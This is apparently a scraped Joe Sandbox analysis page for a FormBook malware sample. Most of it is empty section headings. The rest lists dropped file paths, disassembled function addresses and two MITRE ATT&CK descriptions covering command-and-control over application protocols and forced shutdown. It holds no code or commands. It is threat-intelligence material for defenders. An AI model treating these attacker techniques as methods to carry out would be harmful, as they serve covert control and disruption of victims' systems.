Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wLlREXsA9M.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret\Disdiplomatize.ove

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret\Pampas.sni

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\discous.Sta

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
wLlREXsA9M.exe

Function 0040316D Relevance: 89.6, APIs: 33, Strings: 18, Instructions: 357
stringcomfileCOMMON

Function 004050E4 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540
stringmemoryCOMMON

Function 0040562F Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 004063D8 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00406091 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403A9F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 0040370D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402CFA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00405DAF Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Function 00404FA6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 0040546C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre